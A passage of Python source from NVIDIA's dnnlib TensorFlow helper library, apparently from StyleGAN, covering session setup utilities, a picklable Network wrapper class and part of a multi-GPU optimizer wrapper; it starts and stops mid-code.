with clip.""" with tf.name_scope("LerpClip"): return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0) def absolute_name_scope(scope: str) -> tf.name_scope: """Forcefully enter the specified name scope, ignoring any surrounding scopes.""" return tf.name_scope(scope + "/") def absolute_variable_scope(scope: str, **kwargs) -> tf.variable_scope: """Forcefully enter the specified variable scope, ignoring any surrounding scopes.""" return tf.variable_scope(tf.VariableScope(name=scope, **kwargs), auxiliary_name_scope=False) def _sanitize_tf_config(config_dict: dict = None) -> dict: # Defaults. cfg = dict() cfg["rnd.np_random_seed"] = None # Random seed for NumPy. None = keep as is. cfg["rnd.tf_random_seed"] = "auto" # Random seed for TensorFlow. 'auto' = derive from NumPy random state. None = keep as is. cfg["env.TF_CPP_MIN_LOG_LEVEL"] = "1" # 0 = Print all available debug info from TensorFlow. 1 = Print warnings and errors, but disable debug info. cfg["graph_options.place_pruned_graph"] = True # False = Check that all ops are available on the designated device. True = Skip the check for ops that are not used. cfg["gpu_options.allow_growth"] = True # False = Allocate all GPU memory at the beginning. True = Allocate only as much GPU memory as needed. # User overrides. if config_dict is not None: cfg.update(config_dict) return cfg def init_tf(config_dict: dict = None) -> None: """Initialize TensorFlow session using good default settings.""" # Skip if already initialized. if tf.get_default_session() is not None: return # Setup config dict and random seeds. cfg = _sanitize_tf_config(config_dict) np_random_seed = cfg["rnd.np_random_seed"] if np_random_seed is not None: np.random.seed(np_random_seed) tf_random_seed = cfg["rnd.tf_random_seed"] if tf_random_seed == "auto": tf_random_seed = np.random.randint(1 << 31) if tf_random_seed is not None: tf.set_random_seed(tf_random_seed) # Setup environment variables. for key, value in list(cfg.items()): fields = key.split(".") if fields[0] == "env": assert len(fields) == 2 os.environ[fields[1]] = str(value) # Create default TensorFlow session. create_session(cfg, force_as_default=True) def assert_tf_initialized(): """Check that TensorFlow session has been initialized.""" if tf.get_default_session() is None: raise RuntimeError("No default TensorFlow session found. Please call dnnlib.tflib.init_tf().") def create_session(config_dict: dict = None, force_as_default: bool = False) -> tf.Session: """Create tf.Session based on config dict.""" # Setup TensorFlow config proto. cfg = _sanitize_tf_config(config_dict) config_proto = tf.ConfigProto() for key, value in cfg.items(): fields = key.split(".") if fields[0] not in ["rnd", "env"]: obj = config_proto for field in fields[:-1]: obj = getattr(obj, field) setattr(obj, fields[-1], value) # Create session. session = tf.Session(config=config_proto) if force_as_default: # pylint: disable=protected-access session._default_session = session.as_default() session._default_session.enforce_nesting = False session._default_session.__enter__() # pylint: disable=no-member return session def init_uninitialized_vars(target_vars: List[tf.Variable] = None) -> None: """Initialize all tf.Variables that have not already been initialized. Equivalent to the following, but more efficient and does not bloat the tf graph: tf.variables_initializer(tf.report_uninitialized_variables()).run() """ assert_tf_initialized() if target_vars is None: target_vars = tf.global_variables() test_vars = [] test_ops = [] with tf.control_dependencies(None): # ignore surrounding control_dependencies for var in target_vars: assert is_tf_expression(var) try: tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/IsVariableInitialized:0")) except KeyError: # Op does not exist => variable may be uninitialized. test_vars.append(var) with absolute_name_scope(var.name.split(":")[0]): test_ops.append(tf.is_variable_initialized(var)) init_vars = [var for var, inited in zip(test_vars, run(test_ops)) if not inited] run([var.initializer for var in init_vars]) def set_vars(var_to_value_dict: dict) -> None: """Set the values of given tf.Variables. Equivalent to the following, but more efficient and does not bloat the tf graph: tflib.run([tf.assign(var, value) for var, value in var_to_value_dict.items()] """ assert_tf_initialized() ops = [] feed_dict = {} for var, value in var_to_value_dict.items(): assert is_tf_expression(var) try: setter = tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/setter:0")) # look for existing op except KeyError: with absolute_name_scope(var.name.split(":")[0]): with tf.control_dependencies(None): # ignore surrounding control_dependencies setter = tf.assign(var, tf.placeholder(var.dtype, var.shape, "new_value"), name="setter") # create new setter ops.append(setter) feed_dict[setter.op.inputs[1]] = value run(ops, feed_dict) def create_var_with_large_initial_value(initial_value: np.ndarray, *args, **kwargs): """Create tf.Variable with large initial value without bloating the tf graph.""" assert_tf_initialized() assert isinstance(initial_value, np.ndarray) zeros = tf.zeros(initial_value.shape, initial_value.dtype) var = tf.Variable(zeros, *args, **kwargs) set_vars({var: initial_value}) return var def convert_images_from_uint8(images, drange=[-1,1], nhwc_to_nchw=False): """Convert a minibatch of images from uint8 to float32 with configurable dynamic range. Can be used as an input transformation for Network.run(). """ images = tf.cast(images, tf.float32) if nhwc_to_nchw: images = tf.transpose(images, [0, 3, 1, 2]) return (images - drange[0]) * ((drange[1] - drange[0]) / 255) def convert_images_to_uint8(images, drange=[-1,1], nchw_to_nhwc=False, shrink=1): """Convert a minibatch of images from float32 to uint8 with configurable dynamic range. Can be used as an output transformation for Network.run(). """ images = tf.cast(images, tf.float32) if shrink > 1: ksize = [1, 1, shrink, shrink] images = tf.nn.avg_pool(images, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW") if nchw_to_nhwc: images = tf.transpose(images, [0, 2, 3, 1]) scale = 255 / (drange[1] - drange[0]) images = images * scale + (0.5 - drange[0] * scale) return tf.saturate_cast(images, tf.uint8) File: dnnlib/tflib/network.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper for managing networks.""" import types import inspect import re import uuid import sys import numpy as np import tensorflow as tf from collections import OrderedDict from typing import Any, List, Tuple, Union from . import tfutil from .. import util from .tfutil import TfExpression, TfExpressionEx _import_handlers = [] # Custom import handlers for dealing with legacy data in pickle import. _import_module_src = dict() # Source code for temporary modules created during pickle import. def import_handler(handler_func): """Function decorator for declaring custom import handlers.""" _import_handlers.append(handler_func) return handler_func class Network: """Generic network abstraction. Acts as a convenience wrapper for a parameterized network construction function, providing several utility methods and convenient access to the inputs/outputs/weights. Network objects can be safely pickled and unpickled for long-term archival purposes. The pickling works reliably as long as the underlying network construction function is defined in a standalone Python module that has no side effects or application-specific imports. Args: name: Network name. Used to select TensorFlow name and variable scopes. func_name: Fully qualified name of the underlying network construction function, or a top-level function object. static_kwargs: Keyword arguments to be passed in to the network construction function. Attributes: name: User-specified name, defaults to build func name if None. scope: Unique TensorFlow scope containing template graph and variables, derived from the user-specified name. static_kwargs: Arguments passed to the user-supplied build func. components: Container for sub-networks. Passed to the build func, and retained between calls. num_inputs: Number of input tensors. num_outputs: Number of output tensors. input_shapes: Input tensor shapes (NC or NCHW), including minibatch dimension. output_shapes: Output tensor shapes (NC or NCHW), including minibatch dimension. input_shape: Short-hand for input_shapes[0]. output_shape: Short-hand for output_shapes[0]. input_templates: Input placeholders in the template graph. output_templates: Output tensors in the template graph. input_names: Name string for each input. output_names: Name string for each output. own_vars: Variables defined by this network (local_name => var), excluding sub-networks. vars: All variables (local_name => var). trainables: All trainable variables (local_name => var). var_global_to_local: Mapping from variable global names to local names. """ def __init__(self, name: str = None, func_name: Any = None, **static_kwargs): tfutil.assert_tf_initialized() assert isinstance(name, str) or name is None assert func_name is not None assert isinstance(func_name, str) or util.is_top_level_function(func_name) assert util.is_pickleable(static_kwargs) self._init_fields() self.name = name self.static_kwargs = util.EasyDict(static_kwargs) # Locate the user-specified network build function. if util.is_top_level_function(func_name): func_name = util.get_top_level_function_name(func_name) module, self._build_func_name = util.get_module_from_obj_name(func_name) self._build_func = util.get_obj_from_module(module, self._build_func_name) assert callable(self._build_func) # Dig up source code for the module containing the build function. self._build_module_src = _import_module_src.get(module, None) if self._build_module_src is None: self._build_module_src = inspect.getsource(module) # Init TensorFlow graph. self._init_graph() self.reset_own_vars() def _init_fields(self) -> None: self.name = None self.scope = None self.static_kwargs = util.EasyDict() self.components = util.EasyDict() self.num_inputs = 0 self.num_outputs = 0 self.input_shapes = [[]] self.output_shapes = [[]] self.input_shape = [] self.output_shape = [] self.input_templates = [] self.output_templates = [] self.input_names = [] self.output_names = [] self.own_vars = OrderedDict() self.vars = OrderedDict() self.trainables = OrderedDict() self.var_global_to_local = OrderedDict() self._build_func = None # User-supplied build function that constructs the network. self._build_func_name = None # Name of the build function. self._build_module_src = None # Full source code of the module containing the build function. self._run_cache = dict() # Cached graph data for Network.run(). def _init_graph(self) -> None: # Collect inputs. self.input_names = [] for param in inspect.signature(self._build_func).parameters.values(): if param.kind == param.POSITIONAL_OR_KEYWORD and param.default is param.empty: self.input_names.append(param.name) self.num_inputs = len(self.input_names) assert self.num_inputs >= 1 # Choose name and scope. if self.name is None: self.name = self._build_func_name assert re.match("^[A-Za-z0-9_.\\-]*$", self.name) with tf.name_scope(None): self.scope = tf.get_default_graph().unique_name(self.name, mark_as_used=True) # Finalize build func kwargs. build_kwargs = dict(self.static_kwargs) build_kwargs["is_template_graph"] = True build_kwargs["components"] = self.components # Build template graph. with tfutil.absolute_variable_scope(self.scope, reuse=tf.AUTO_REUSE), tfutil.absolute_name_scope(self.scope): # ignore surrounding scopes assert tf.get_variable_scope().name == self.scope assert tf.get_default_graph().get_name_scope() == self.scope with tf.control_dependencies(None): # ignore surrounding control dependencies self.input_templates = [tf.placeholder(tf.float32, name=name) for name in self.input_names] out_expr = self._build_func(*self.input_templates, **build_kwargs) # Collect outputs. assert tfutil.is_tf_expression(out_expr) or isinstance(out_expr, tuple) self.output_templates = [out_expr] if tfutil.is_tf_expression(out_expr) else list(out_expr) self.num_outputs = len(self.output_templates) assert self.num_outputs >= 1 assert all(tfutil.is_tf_expression(t) for t in self.output_templates) # Perform sanity checks. if any(t.shape.ndims is None for t in self.input_templates): raise ValueError("Network input shapes not defined. Please call x.set_shape() for each input.") if any(t.shape.ndims is None for t in self.output_templates): raise ValueError("Network output shapes not defined. Please call x.set_shape() where applicable.") if any(not isinstance(comp, Network) for comp in self.components.values()): raise ValueError("Components of a Network must be Networks themselves.") if len(self.components) != len(set(comp.name for comp in self.components.values())): raise ValueError("Components of a Network must have unique names.") # List inputs and outputs. self.input_shapes = [tfutil.shape_to_list(t.shape) for t in self.input_templates] self.output_shapes = [tfutil.shape_to_list(t.shape) for t in self.output_templates] self.input_shape = self.input_shapes[0] self.output_shape = self.output_shapes[0] self.output_names = [t.name.split("/")[-1].split(":")[0] for t in self.output_templates] # List variables. self.own_vars = OrderedDict((var.name[len(self.scope) + 1:].split(":")[0], var) for var in tf.global_variables(self.scope + "/")) self.vars = OrderedDict(self.own_vars) self.vars.update((comp.name + "/" + name, var) for comp in self.components.values() for name, var in comp.vars.items()) self.trainables = OrderedDict((name, var) for name, var in self.vars.items() if var.trainable) self.var_global_to_local = OrderedDict((var.name.split(":")[0], name) for name, var in self.vars.items()) def reset_own_vars(self) -> None: """Re-initialize all variables of this network, excluding sub-networks.""" tfutil.run([var.initializer for var in self.own_vars.values()]) def reset_vars(self) -> None: """Re-initialize all variables of this network, including sub-networks.""" tfutil.run([var.initializer for var in self.vars.values()]) def reset_trainables(self) -> None: """Re-initialize all trainable variables of this network, including sub-networks.""" tfutil.run([var.initializer for var in self.trainables.values()]) def get_output_for(self, *in_expr: TfExpression, return_as_list: bool = False, **dynamic_kwargs) -> Union[TfExpression, List[TfExpression]]: """Construct TensorFlow expression(s) for the output(s) of this network, given the input expression(s).""" assert len(in_expr) == self.num_inputs assert not all(expr is None for expr in in_expr) # Finalize build func kwargs. build_kwargs = dict(self.static_kwargs) build_kwargs.update(dynamic_kwargs) build_kwargs["is_template_graph"] = False build_kwargs["components"] = self.components # Build TensorFlow graph to evaluate the network. with tfutil.absolute_variable_scope(self.scope, reuse=True), tf.name_scope(self.name): assert tf.get_variable_scope().name == self.scope valid_inputs = [expr for expr in in_expr if expr is not None] final_inputs = [] for expr, name, shape in zip(in_expr, self.input_names, self.input_shapes): if expr is not None: expr = tf.identity(expr, name=name) else: expr = tf.zeros([tf.shape(valid_inputs[0])[0]] + shape[1:], name=name) final_inputs.append(expr) out_expr = self._build_func(*final_inputs, **build_kwargs) # Propagate input shapes back to the user-specified expressions. for expr, final in zip(in_expr, final_inputs): if isinstance(expr, tf.Tensor): expr.set_shape(final.shape) # Express outputs in the desired format. assert tfutil.is_tf_expression(out_expr) or isinstance(out_expr, tuple) if return_as_list: out_expr = [out_expr] if tfutil.is_tf_expression(out_expr) else list(out_expr) return out_expr def get_var_local_name(self, var_or_global_name: Union[TfExpression, str]) -> str: """Get the local name of a given variable, without any surrounding name scopes.""" assert tfutil.is_tf_expression(var_or_global_name) or isinstance(var_or_global_name, str) global_name = var_or_global_name if isinstance(var_or_global_name, str) else var_or_global_name.name return self.var_global_to_local[global_name] def find_var(self, var_or_local_name: Union[TfExpression, str]) -> TfExpression: """Find variable by local or global name.""" assert tfutil.is_tf_expression(var_or_local_name) or isinstance(var_or_local_name, str) return self.vars[var_or_local_name] if isinstance(var_or_local_name, str) else var_or_local_name def get_var(self, var_or_local_name: Union[TfExpression, str]) -> np.ndarray: """Get the value of a given variable as NumPy array. Note: This method is very inefficient -- prefer to use tflib.run(list_of_vars) whenever possible.""" return self.find_var(var_or_local_name).eval() def set_var(self, var_or_local_name: Union[TfExpression, str], new_value: Union[int, float, np.ndarray]) -> None: """Set the value of a given variable based on the given NumPy array. Note: This method is very inefficient -- prefer to use tflib.set_vars() whenever possible.""" tfutil.set_vars({self.find_var(var_or_local_name): new_value}) def __getstate__(self) -> dict: """Pickle export.""" state = dict() state["version"] = 3 state["name"] = self.name state["static_kwargs"] = dict(self.static_kwargs) state["components"] = dict(self.components) state["build_module_src"] = self._build_module_src state["build_func_name"] = self._build_func_name state["variables"] = list(zip(self.own_vars.keys(), tfutil.run(list(self.own_vars.values())))) return state def __setstate__(self, state: dict) -> None: """Pickle import.""" # pylint: disable=attribute-defined-outside-init tfutil.assert_tf_initialized() self._init_fields() # Execute custom import handlers. for handler in _import_handlers: state = handler(state) # Set basic fields. assert state["version"] in [2, 3] self.name = state["name"] self.static_kwargs = util.EasyDict(state["static_kwargs"]) self.components = util.EasyDict(state.get("components", {})) self._build_module_src = state["build_module_src"] self._build_func_name = state["build_func_name"] # Create temporary module from the imported source code. module_name = "_tflib_network_import_" + uuid.uuid4().hex module = types.ModuleType(module_name) sys.modules[module_name] = module _import_module_src[module] = self._build_module_src exec(self._build_module_src, module.__dict__) # pylint: disable=exec-used # Locate network build function in the temporary module. self._build_func = util.get_obj_from_module(module, self._build_func_name) assert callable(self._build_func) # Init TensorFlow graph. self._init_graph() self.reset_own_vars() tfutil.set_vars({self.find_var(name): value for name, value in state["variables"]}) def clone(self, name: str = None, **new_static_kwargs) -> "Network": """Create a clone of this network with its own copy of the variables.""" # pylint: disable=protected-access net = object.__new__(Network) net._init_fields() net.name = name if name is not None else self.name net.static_kwargs = util.EasyDict(self.static_kwargs) net.static_kwargs.update(new_static_kwargs) net._build_module_src = self._build_module_src net._build_func_name = self._build_func_name net._build_func = self._build_func net._init_graph() net.copy_vars_from(self) return net def copy_own_vars_from(self, src_net: "Network") -> None: """Copy the values of all variables from the given network, excluding sub-networks.""" names = [name for name in self.own_vars.keys() if name in src_net.own_vars] tfutil.set_vars(tfutil.run({self.vars[name]: src_net.vars[name] for name in names})) def copy_vars_from(self, src_net: "Network") -> None: """Copy the values of all variables from the given network, including sub-networks.""" names = [name for name in self.vars.keys() if name in src_net.vars] tfutil.set_vars(tfutil.run({self.vars[name]: src_net.vars[name] for name in names})) def copy_trainables_from(self, src_net: "Network") -> None: """Copy the values of all trainable variables from the given network, including sub-networks.""" names = [name for name in self.trainables.keys() if name in src_net.trainables] tfutil.set_vars(tfutil.run({self.vars[name]: src_net.vars[name] for name in names})) def convert(self, new_func_name: str, new_name: str = None, **new_static_kwargs) -> "Network": """Create new network with the given parameters, and copy all variables from this network.""" if new_name is None: new_name = self.name static_kwargs = dict(self.static_kwargs) static_kwargs.update(new_static_kwargs) net = Network(name=new_name, func_name=new_func_name, **static_kwargs) net.copy_vars_from(self) return net def setup_as_moving_average_of(self, src_net: "Network", beta: TfExpressionEx = 0.99, beta_nontrainable: TfExpressionEx = 0.0) -> tf.Operation: """Construct a TensorFlow op that updates the variables of this network to be slightly closer to those of the given network.""" with tfutil.absolute_name_scope(self.scope + "/_MovingAvg"): ops = [] for name, var in self.vars.items(): if name in src_net.vars: cur_beta = beta if name in self.trainables else beta_nontrainable new_value = tfutil.lerp(src_net.vars[name], var, cur_beta) ops.append(var.assign(new_value)) return tf.group(*ops) def run(self, *in_arrays: Tuple[Union[np.ndarray, None], ...], input_transform: dict = None, output_transform: dict = None, return_as_list: bool = False, print_progress: bool = False, minibatch_size: int = None, num_gpus: int = 1, assume_frozen: bool = False, **dynamic_kwargs) -> Union[np.ndarray, Tuple[np.ndarray, ...], List[np.ndarray]]: """Run this network for the given NumPy array(s), and return the output(s) as NumPy array(s). Args: input_transform: A dict specifying a custom transformation to be applied to the input tensor(s) before evaluating the network. The dict must contain a 'func' field that points to a top-level function. The function is called with the input TensorFlow expression(s) as positional arguments. Any remaining fields of the dict will be passed in as kwargs. output_transform: A dict specifying a custom transformation to be applied to the output tensor(s) after evaluating the network. The dict must contain a 'func' field that points to a top-level function. The function is called with the output TensorFlow expression(s) as positional arguments. Any remaining fields of the dict will be passed in as kwargs. return_as_list: True = return a list of NumPy arrays, False = return a single NumPy array, or a tuple if there are multiple outputs. print_progress: Print progress to the console? Useful for very large input arrays. minibatch_size: Maximum minibatch size to use, None = disable batching. num_gpus: Number of GPUs to use. assume_frozen: Improve multi-GPU performance by assuming that the trainable parameters will remain changed between calls. dynamic_kwargs: Additional keyword arguments to be passed into the network build function. """ assert len(in_arrays) == self.num_inputs assert not all(arr is None for arr in in_arrays) assert input_transform is None or util.is_top_level_function(input_transform["func"]) assert output_transform is None or util.is_top_level_function(output_transform["func"]) output_transform, dynamic_kwargs = _handle_legacy_output_transforms(output_transform, dynamic_kwargs) num_items = in_arrays[0].shape[0] if minibatch_size is None: minibatch_size = num_items # Construct unique hash key from all arguments that affect the TensorFlow graph. key = dict(input_transform=input_transform, output_transform=output_transform, num_gpus=num_gpus, assume_frozen=assume_frozen, dynamic_kwargs=dynamic_kwargs) def unwind_key(obj): if isinstance(obj, dict): return [(key, unwind_key(value)) for key, value in sorted(obj.items())] if callable(obj): return util.get_top_level_function_name(obj) return obj key = repr(unwind_key(key)) # Build graph. if key not in self._run_cache: with tfutil.absolute_name_scope(self.scope + "/_Run"), tf.control_dependencies(None): with tf.device("/cpu:0"): in_expr = [tf.placeholder(tf.float32, name=name) for name in self.input_names] in_split = list(zip(*[tf.split(x, num_gpus) for x in in_expr])) out_split = [] for gpu in range(num_gpus): with tf.device("/gpu:%d" % gpu): net_gpu = self.clone() if assume_frozen else self in_gpu = in_split[gpu] if input_transform is not None: in_kwargs = dict(input_transform) in_gpu = in_kwargs.pop("func")(*in_gpu, **in_kwargs) in_gpu = [in_gpu] if tfutil.is_tf_expression(in_gpu) else list(in_gpu) assert len(in_gpu) == self.num_inputs out_gpu = net_gpu.get_output_for(*in_gpu, return_as_list=True, **dynamic_kwargs) if output_transform is not None: out_kwargs = dict(output_transform) out_gpu = out_kwargs.pop("func")(*out_gpu, **out_kwargs) out_gpu = [out_gpu] if tfutil.is_tf_expression(out_gpu) else list(out_gpu) assert len(out_gpu) == self.num_outputs out_split.append(out_gpu) with tf.device("/cpu:0"): out_expr = [tf.concat(outputs, axis=0) for outputs in zip(*out_split)] self._run_cache[key] = in_expr, out_expr # Run minibatches. in_expr, out_expr = self._run_cache[key] out_arrays = [np.empty([num_items] + tfutil.shape_to_list(expr.shape)[1:], expr.dtype.name) for expr in out_expr] for mb_begin in range(0, num_items, minibatch_size): if print_progress: print("\r%d / %d" % (mb_begin, num_items), end="") mb_end = min(mb_begin + minibatch_size, num_items) mb_num = mb_end - mb_begin mb_in = [src[mb_begin : mb_end] if src is not None else np.zeros([mb_num] + shape[1:]) for src, shape in zip(in_arrays, self.input_shapes)] mb_out = tf.get_default_session().run(out_expr, dict(zip(in_expr, mb_in))) for dst, src in zip(out_arrays, mb_out): dst[mb_begin: mb_end] = src # Done. if print_progress: print("\r%d / %d" % (num_items, num_items)) if not return_as_list: out_arrays = out_arrays[0] if len(out_arrays) == 1 else tuple(out_arrays) return out_arrays def list_ops(self) -> List[TfExpression]: include_prefix = self.scope + "/" exclude_prefix = include_prefix + "_" ops = tf.get_default_graph().get_operations() ops = [op for op in ops if op.name.startswith(include_prefix)] ops = [op for op in ops if not op.name.startswith(exclude_prefix)] return ops def list_layers(self) -> List[Tuple[str, TfExpression, List[TfExpression]]]: """Returns a list of (layer_name, output_expr, trainable_vars) tuples corresponding to individual layers of the network. Mainly intended to be used for reporting.""" layers = [] def recurse(scope, parent_ops, parent_vars, level): # Ignore specific patterns. if any(p in scope for p in ["/Shape", "/strided_slice", "/Cast", "/concat", "/Assign"]): return # Filter ops and vars by scope. global_prefix = scope + "/" local_prefix = global_prefix[len(self.scope) + 1:] cur_ops = [op for op in parent_ops if op.name.startswith(global_prefix) or op.name == global_prefix[:-1]] cur_vars = [(name, var) for name, var in parent_vars if name.startswith(local_prefix) or name == local_prefix[:-1]] if not cur_ops and not cur_vars: return # Filter out all ops related to variables. for var in [op for op in cur_ops if op.type.startswith("Variable")]: var_prefix = var.name + "/" cur_ops = [op for op in cur_ops if not op.name.startswith(var_prefix)] # Scope does not contain ops as immediate children => recurse deeper. contains_direct_ops = any("/" not in op.name[len(global_prefix):] and op.type != "Identity" for op in cur_ops) if (level == 0 or not contains_direct_ops) and (len(cur_ops) + len(cur_vars)) > 1: visited = set() for rel_name in [op.name[len(global_prefix):] for op in cur_ops] + [name[len(local_prefix):] for name, _var in cur_vars]: token = rel_name.split("/")[0] if token not in visited: recurse(global_prefix + token, cur_ops, cur_vars, level + 1) visited.add(token) return # Report layer. layer_name = scope[len(self.scope) + 1:] layer_output = cur_ops[-1].outputs[0] if cur_ops else cur_vars[-1][1] layer_trainables = [var for _name, var in cur_vars if var.trainable] layers.append((layer_name, layer_output, layer_trainables)) recurse(self.scope, self.list_ops(), list(self.vars.items()), 0) return layers def print_layers(self, title: str = None, hide_layers_with_no_params: bool = False) -> None: """Print a summary table of the network structure.""" rows = [[title if title is not None else self.name, "Params", "OutputShape", "WeightShape"]] rows += [["---"] * 4] total_params = 0 for layer_name, layer_output, layer_trainables in self.list_layers(): num_params = sum(np.prod(tfutil.shape_to_list(var.shape)) for var in layer_trainables) weights = [var for var in layer_trainables if var.name.endswith("/weight:0")] weights.sort(key=lambda x: len(x.name)) if len(weights) == 0 and len(layer_trainables) == 1: weights = layer_trainables total_params += num_params if not hide_layers_with_no_params or num_params != 0: num_params_str = str(num_params) if num_params > 0 else "-" output_shape_str = str(layer_output.shape) weight_shape_str = str(weights[0].shape) if len(weights) >= 1 else "-" rows += [[layer_name, num_params_str, output_shape_str, weight_shape_str]] rows += [["---"] * 4] rows += [["Total", str(total_params), "", ""]] widths = [max(len(cell) for cell in column) for column in zip(*rows)] print() for row in rows: print(" ".join(cell + " " * (width - len(cell)) for cell, width in zip(row, widths))) print() def setup_weight_histograms(self, title: str = None) -> None: """Construct summary ops to include histograms of all trainable parameters in TensorBoard.""" if title is None: title = self.name with tf.name_scope(None), tf.device(None), tf.control_dependencies(None): for local_name, var in self.trainables.items(): if "/" in local_name: p = local_name.split("/") name = title + "_" + p[-1] + "/" + "_".join(p[:-1]) else: name = title + "_toplevel/" + local_name tf.summary.histogram(name, var) #---------------------------------------------------------------------------- # Backwards-compatible emulation of legacy output transformation in Network.run(). _print_legacy_warning = True def _handle_legacy_output_transforms(output_transform, dynamic_kwargs): global _print_legacy_warning legacy_kwargs = ["out_mul", "out_add", "out_shrink", "out_dtype"] if not any(kwarg in dynamic_kwargs for kwarg in legacy_kwargs): return output_transform, dynamic_kwargs if _print_legacy_warning: _print_legacy_warning = False print() print("WARNING: Old-style output transformations in Network.run() are deprecated.") print("Consider using 'output_transform=dict(func=tflib.convert_images_to_uint8)'") print("instead of 'out_mul=127.5, out_add=127.5, out_dtype=np.uint8'.") print() assert output_transform is None new_kwargs = dict(dynamic_kwargs) new_transform = {kwarg: new_kwargs.pop(kwarg) for kwarg in legacy_kwargs if kwarg in dynamic_kwargs} new_transform["func"] = _legacy_output_transform_func return new_transform, new_kwargs def _legacy_output_transform_func(*expr, out_mul=1.0, out_add=0.0, out_shrink=1, out_dtype=None): if out_mul != 1.0: expr = [x * out_mul for x in expr] if out_add != 0.0: expr = [x + out_add for x in expr] if out_shrink > 1: ksize = [1, 1, out_shrink, out_shrink] expr = [tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW") for x in expr] if out_dtype is not None: if tf.as_dtype(out_dtype).is_integer: expr = [tf.round(x) for x in expr] expr = [tf.saturate_cast(x, out_dtype) for x in expr] return expr File: dnnlib/tflib/optimizer.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper wrapper for a Tensorflow optimizer.""" import numpy as np import tensorflow as tf from collections import OrderedDict from typing import List, Union from . import autosummary from . import tfutil from .. import util from .tfutil import TfExpression, TfExpressionEx try: # TensorFlow 1.13 from tensorflow.python.ops import nccl_ops except: # Older TensorFlow versions import tensorflow.contrib.nccl as nccl_ops class Optimizer: """A Wrapper for tf.train.Optimizer. Automatically takes care of: - Gradient averaging for multi-GPU training. - Dynamic loss scaling and typecasts for FP16 training. - Ignoring corrupted gradients that contain NaNs/Infs. - Reporting statistics. - Well-chosen default settings. """ def __init__(self, name: str = "Train", tf_optimizer: str = "tf.train.AdamOptimizer", learning_rate: TfExpressionEx = 0.001, use_loss_scaling: bool = False, loss_scaling_init: float = 64.0, loss_scaling_inc: float = 0.0005, loss_scaling_dec: float = 1.0, **kwargs): # Init fields. self.name = name self.learning_rate = tf.convert_to_tensor(learning_rate) self.id = self.name.replace("/", ".") self.scope = tf.get_default_graph().unique_name(self.id) self.optimizer_class = util.get_obj_by_name(tf_optimizer) self.optimizer_kwargs = dict(kwargs) self.use_loss_scaling = use_loss_scaling self.loss_scaling_init = loss_scaling_init self.loss_scaling_inc = loss_scaling_inc self.loss_scaling_dec = loss_scaling_dec self._grad_shapes = None # [shape, ...] self._dev_opt = OrderedDict() # device => optimizer self._dev_grads = OrderedDict() # device => [[(grad, var), ...], ...] self._dev_ls_var = OrderedDict() # device => variable (log2 of loss scaling factor) self._updates_applied = False def register_gradients(self, loss: TfExpression, trainable_vars: Union[List, dict]) -> None: """Register the gradients of the given loss function with respect to the given variables. Intended to be called once per GPU.""" assert not self._updates_applied # Validate arguments. if isinstance(trainable_vars, dict): trainable_vars = list(trainable_vars.values()) # allow passing in Network.trainables as vars assert isinstance(trainable_vars, list) and len(trainable_vars) >= 1 assert all(tfutil.is_tf_expression(expr) for expr in trainable_vars + [loss]) if self._grad_shapes is None: self._grad_shapes = [tfutil.shape_to_list(var.shape) for var in trainable_vars] assert len(trainable_vars) == len(self._grad_shapes) assert all(tfutil.shape_to_list(var.shape) == var_shape for var, var_shape in zip(trainable_vars, self._grad_shapes)) dev = loss.device assert all(var.device == dev for var in trainable_vars) # Register device and compute gradients. with tf.name_scope(self.id + "_grad"), tf.device(dev): if dev not in self._dev_opt: opt_name = self.scope.replace("/", "_") + "_opt%d" % len(self._dev_opt) assert callable(self.optimizer_class) self._dev_opt[dev] = self.optimizer_class(name=opt_name, learning_rate=self.learning_rate, **self.optimizer_kwargs) self._dev_grads[dev] = [] loss = self.apply_loss_scaling(tf.cast(loss, tf.float32)) grads = self._dev_opt[dev].compute_gradients(loss, trainable_vars, gate_gradients=tf.train.Optimizer.GATE_NONE) # disable gating to reduce memory usage grads = [(g, v) if g is not None else (tf.zeros_like(v), v) for g, v in grads] # replace disconnected gradients with zeros self._dev_grads[dev].append(grads) def apply_updates(self) -> tf.Operation: """Construct training op to update the registered variables based on their gradients.""" tfutil.assert_tf_initialized() assert not self._updates_applied self._updates_applied = True devices = list(self._dev_grads.keys()) total_grads = sum(len(grads) for grads in self._dev_grads.values()) assert len(devices) >= 1 and total_grads >= 1 ops = [] with tfutil.absolute_name_scope(self.scope): # Cast gradients to FP32 and calculate partial sum within each device. dev_grads = OrderedDict() # device => [(grad, var), ...] for dev_idx, dev in enumerate(devices): with tf.name_scope("ProcessGrads%d" % dev_idx), tf.device(dev): sums = [] for gv in zip(*self._dev_grads[dev]): assert all(v is gv[0][1] for g, v in gv) g = [tf.cast(g, tf.float32) for g, v in gv] g = g[0] if len(g) == 1 else tf.add_n(g) sums.append((g, gv[0][1])) dev_grads[dev] = sums # Sum gradients across devices. if len(devices) > 1: with tf.name_scope("SumAcrossGPUs"), tf.device(None): for var_idx, grad_shape in enumerate(self._grad_shapes): g = [dev_grads[dev][var_idx][0] for dev in devices] if np.prod(grad_shape): # nccl does not support zero-sized tensors g = nccl_ops.all_sum(g) for dev, gg in zip(devices, g): dev_grads[dev][var_idx] = (gg, dev_grads[dev][var_idx][1]) # Apply updates separately on each device. for dev_idx, (dev, grads) in enumerate(dev_grads.items()): with tf.name_scope("ApplyGrads%d" % dev_idx), tf.device(dev): # Scale gradients as needed. if self.use_loss_scaling or total_grads > 1: with tf.name_scope("Scale"): coef = tf.constant(np.float32(1.0 / total_grads), name="coef") coef = self.undo_loss_scaling(coef) grads = [(g * coef, v) for g, v in grads] # Check for overflows. with tf.name_scope("CheckOverflow"): grad_ok = tf.reduce_all(tf.stack([tf.reduce_all(tf.is_finite(g)) for g, v in grads])) # Update weights and adjust loss scaling. with tf.name_scope("UpdateWeights"): # pylint: disable=cell-var-from-loop 